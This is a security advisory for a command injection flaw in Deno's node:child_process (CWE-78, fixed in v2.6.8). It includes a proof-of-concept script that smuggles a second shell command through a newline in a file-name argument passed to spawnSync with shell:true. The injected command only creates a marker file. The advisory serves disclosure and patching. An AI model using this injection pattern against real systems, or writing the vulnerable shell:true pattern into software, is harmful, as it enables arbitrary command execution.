A command injection vulnerability exists in Deno's node:child_process implementation.
import { spawnSync } from "node:child_process";
import * as fs from "node:fs";
// Cleanup
try { fs.unlinkSync('/tmp/rce_proof'); } catch {}
// Create legitimate script
fs.writeFileSync('/tmp/legitimate.ts', 'console.log("normal");');
// Malicious input with newline injection
const maliciousInput = `/tmp/legitimate.ts\ntouch /tmp/rce_proof`;
// Vulnerable pattern
spawnSync(Deno.execPath(), ['run', '--allow-all', maliciousInput], {
shell: true,
encoding: 'utf-8'
});
// Verify
console.log('Exploit worked:', fs.existsSync('/tmp/rce_proof'));
Run: deno run --allow-all poc.mjs
The file /tmp/rce_proof is created, confirming arbitrary command execution.
All users need to update to the patched version (Deno v2.6.8).
{
"nvd_published_at": "2026-02-20T21:19:28Z",
"github_reviewed_at": "2026-02-19T20:31:41Z",
"github_reviewed": true,
"severity": "HIGH",
"cwe_ids": [
"CWE-78"
]
}